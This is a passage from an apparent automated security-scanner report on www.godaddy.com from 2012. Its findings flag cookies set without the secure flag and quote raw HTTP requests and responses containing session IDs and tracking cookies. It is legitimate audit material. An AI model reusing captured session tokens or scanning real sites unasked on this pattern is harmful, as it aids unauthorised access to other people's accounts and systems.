Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:27 GMT; path=/
Set-Cookie: SplitValue1=73; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:27 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=73; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:27 GMT
Connection: close
Content-Length: 104816


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

2.3. https://www.godaddy.com/agreements/showdoc.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /agreements/showdoc.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /agreements/showdoc.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ukvnbsftqtrdmk5xunbwubh5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ukvnbsftqtrdmk5xunbwubh5; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=65; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:25 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/agreements/showdoc.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=65; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:25 GMT
Connection: close
Content-Length: 8660


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

2.4. https://www.godaddy.com/domains/customize.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/customize.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/customize.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/domains/nodomain.aspx?ci=17302
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=tls0qyhey40fxeftakfyg0zz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=tls0qyhey40fxeftakfyg0zz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:06 GMT
Connection: close
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/domains/nodomain.aspx?ci=17302">here</a>.</h2>
</body></html>

2.5. https://www.godaddy.com/domains/customize/JsonContent/ActivateYourDomain.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/ActivateYourDomain.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/customize/JsonContent/ActivateYourDomain.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=pffytsfjssld3ehu4r12pd54; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:10 GMT
Connection: close
Content-Length: 0


2.6. https://www.godaddy.com/domains/customize/JsonContent/DomainPrivacyAndProtection.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/DomainPrivacyAndProtection.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/customize/JsonContent/DomainPrivacyAndProtection.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=s01tlmuzmmbn5g0im4314hnr; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:09 GMT
Connection: close
Content-Length: 0


2.7. https://www.godaddy.com/domains/customize/JsonContent/DomainRegistrationInformation.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/DomainRegistrationInformation.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/customize/JsonContent/DomainRegistrationInformation.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=fellojccmcp0vcqnzju0lc4r; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:07 GMT
Connection: close
Content-Length: 0


2.8. https://www.godaddy.com/domains/customize/JsonContent/DomainSettings.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/customize/JsonContent/DomainSettings.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /domains/customize/JsonContent/DomainSettings.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xnpeoa3e4dty5tonlguis3mu; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:43:07 GMT
Connection: close
Content-Length: 0


2.9. https://www.godaddy.com/domains/domain-broker.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/domain-broker.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/domain-broker.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=auageiizdofjb210w1j2y0dm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=auageiizdofjb210w1j2y0dm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:03 GMT; path=/
Set-Cookie: SplitValue1=9; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:03 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/domain-broker.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=9; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:03 GMT
Connection: close
Content-Length: 92865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

2.10. https://www.godaddy.com/domains/popups/icannfee.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/popups/icannfee.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/popups/icannfee.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=uwshsnc43veo2rxw44tbjn2f; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=uwshsnc43veo2rxw44tbjn2f; path=/; HttpOnly
Set-Cookie: SplitValue1=55; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:00 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/popups/icannfee.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=55; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:42:59 GMT
Connection: close
Content-Length: 2083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

2.11. https://www.godaddy.com/domains/searchresults.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /domains/searchresults.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/searchresults.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/domains/search.aspx?ci=53972
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ug2mj50ughc5yetv11ge4mte; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ug2mj50ughc5yetv11ge4mte; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:17 GMT
Connection: close
Content-Length: 169

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/domains/search.aspx?ci=53972">here</a>.</h2>
</body></html>

2.12. https://www.godaddy.com/legal-agreements.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /legal-agreements.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /legal-agreements.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ly0fnf4j420wnozzu4yomz3r; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ly0fnf4j420wnozzu4yomz3r; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:21 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:21 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:43:21 GMT; path=/
Set-Cookie: SplitValue1=75; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:43:21 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/legal-agreements.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:21 GMT
Connection: close
Content-Length: 182283


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

2.13. https://www.godaddy.com/offers/hot-deals.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /offers/hot-deals.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/hot-deals.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=neifplqwwfo5vofgmfhmtoea; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=neifplqwwfo5vofgmfhmtoea; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:43:19 GMT
Connection: close
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.godaddy.com/offers/hot-deals2.aspx?ci=51455">here</a>.</h2>
</body></html>

2.14. https://www.godaddy.com/offers/hot-deals2.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /offers/hot-deals2.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/hot-deals2.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=hfbvjwwihiuqex24nd3xzdbo; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=hfbvjwwihiuqex24nd3xzdbo; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 02:00:12 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 02:00:12 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 02:00:12 GMT; path=/
Set-Cookie: SplitValue1=12; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:12 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/hot-deals2.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=12; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:12 GMT
Connection: close
Content-Length: 97466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...

2.15. https://www.godaddy.com/offers/jsoncontent/domaindeals.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/domaindeals.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/jsoncontent/domaindeals.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=f3duk25uhxn2uj1hdaujgvpt; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=f3duk25uhxn2uj1hdaujgvpt; path=/; HttpOnly
Set-Cookie: SplitValue1=73; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:15 GMT; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/domaindeals.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=73; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:14 GMT
Connection: close
Content-Length: 21787

{"Html":"\r\n \u003cstyle\u003e\r\n .showPride{text-transform:uppercase;color:#fff;height:15px;font-weight:bold;}\r\n .showPride span{display:inline-block;width:10%;height:100%;float:left}\r\n
...[SNIP]...

2.16. https://www.godaddy.com/offers/jsoncontent/productsales.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/productsales.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/jsoncontent/productsales.aspx?ci=51455%2c50961 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xkxjrzfawt0ymo1hwxud4trz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xkxjrzfawt0ymo1hwxud4trz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Set-Cookie: SplitValue1=78; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:19 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/productsales.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=51455%2c50961&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=78; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:18 GMT
Connection: close
Content-Length: 6614

{"Html":" \r\n \u003cstyle\u003e\r\n /*Small sale tag */\r\n .gdhp-sale-banner-small{height:16px;position:relative;top:-10px;}\r\n .gdhp-sale-banner-small-text{position:relative;float:left;
...[SNIP]...

2.17. https://www.godaddy.com/offers/jsoncontent/recommendeddomains.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/recommendeddomains.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/jsoncontent/recommendeddomains.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=33fsvm40tcmlxjs3ig0a3n5g; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=33fsvm40tcmlxjs3ig0a3n5g; path=/; HttpOnly
Set-Cookie: SplitValue1=7; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendeddomains.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=7; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:17 GMT
Connection: close
Content-Length: 670

{"Html":"\r\n \u003cdiv class=\"dealstitle\"\u003e\r\n \u003cdiv class=\"namematchheading\"\u003e\u003c/div\u003e\r\n \u003ch4\u003eExpand your reach on the Web with personalized domain suggest
...[SNIP]...

2.18. https://www.godaddy.com/offers/jsoncontent/recommendedoffers.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /offers/jsoncontent/recommendedoffers.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /offers/jsoncontent/recommendedoffers.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vxqk0laxobgfz2vx24143m4r; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vxqk0laxobgfz2vx24143m4r; path=/; HttpOnly
Set-Cookie: SplitValue1=99; domain=godaddy.com; expires=Tue, 06-Mar-2012 02:00:16 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/offers/jsoncontent/recommendedoffers.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=99; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 02:00:16 GMT
Connection: close
Content-Length: 763

{"Html":"\r\n \u003cdiv class=\"dealstitle\"\u003e\r\n \u003ch3\u003eRecommended Offers\u003c/h3\u003e\r\n \u003ch4\u003eDo more online with special savings on the products you really want. Gra
...[SNIP]...

2.19. https://www.godaddy.com/sso/keepalive.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.godaddy.com
Path:   /sso/keepalive.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/keepalive.aspx?rand=184318 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.godaddy.com/gdshop/shopper_lookup.asp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.godaddy.com
Connection: Keep-Alive
Cookie: adc1=US; serverVersion=A; domainYardVal=%2D1; currency1=potableSourceStr=USD; traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB137&ci=&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=174%2E36%2E218%2E2&status=200+OK&referrer=&cookies=1; PCSplitValue1=3; preferences1=_sid=&gdshop_currencyType=USD&dataCenterCode=US; ASPSESSIONIDQGQBBDAA=LIKAMEKBEMKIHPKFPEGDMAGF

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=bh313cwdj4vmr2gm5m3zxsur; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Date: Mon, 05 Mar 2012 01:55:58 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

2.20. https://www.godaddy.com/domains/customize.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/customize.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/customize.aspx?ci=14641 HTTP/1.1
Host: www.godaddy.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/domains/searchresults.aspx?ci=44919
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; pagecount=4; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=1&fMajorVer=11&slMajorVer=-1&slMinorVer=-1; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; adc1=US; currency1=potableSourceStr=USD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:32:35 GMT; path=/
